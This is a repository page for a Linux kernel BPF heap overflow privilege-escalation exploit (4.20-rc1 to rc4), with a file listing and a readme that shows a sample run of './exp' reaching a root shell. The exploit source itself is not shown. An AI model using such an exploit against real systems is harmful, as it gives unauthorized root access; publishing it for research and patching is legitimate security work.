exploit code for a bpf heap overflow vulnerability
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
bzImage
config
exp.c
readme.txt
start.sh

readme.txt

This is a local priviledge escalation exploit for a kernel bpf bug.
affected version: 4.20-rc1, 4.20-rc2, 4.20-rc3, 4.20-rc4

```bash
user@syzkaller:~$ ./exp
rop_payload_initialized
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:kernel_t:s0
# uname -a
Linux syzkaller 4.20.0-rc3 #1 SMP Thu Nov 22 15:12:38 CST 2018 x86_64 GNU/Linux
#
```

references:
https://www.mail-archive.com/netdev@vger.kernel.org/msg256073.html
https://www.mail-archive.com/netdev@vger.kernel.org/msg256054.html